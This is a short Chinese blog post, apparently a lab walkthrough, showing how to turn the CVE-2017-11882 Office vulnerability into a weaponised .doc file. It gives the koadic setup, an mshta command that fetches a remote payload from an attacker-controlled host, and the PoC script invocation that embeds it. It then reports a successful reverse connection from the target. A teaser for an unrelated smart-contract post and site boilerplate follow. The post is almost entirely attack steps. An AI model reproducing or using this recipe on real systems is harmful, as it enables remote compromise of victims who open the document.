项目地址:https://github.com/iBearcat/CVE-2017-11882
首先开启koadic,然后配置一下
复制这句代码
1
|
mshta http://192.168.220.132:9999/dHem0
|
然后生成doc文件
1
|
python Command_CVE–2017–11882.py –c “mshta http://192.168.220.132:9999/dHem0” –o sch01ar.doc
|
注:命令长度不能超过43 bytes
然后拿到靶机里测试
打开文件(word测试版本位2007)
目标主机反弹成功
原文链接:http://www.cnblogs.com/sch01ar/p/7875726.html
最近稍微有点空闲,就想去好好研究下智能合约的安全问题,因为是新兴产业,所以没有现成的教程或者是材料,所以只能找一些较为基础但是能够帮助我们学习智能合约的平台,这里的Ethernaut就是一个基于web3和solidity的智能合约审计平台。 平台地址:http…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
请登录后发表评论
注册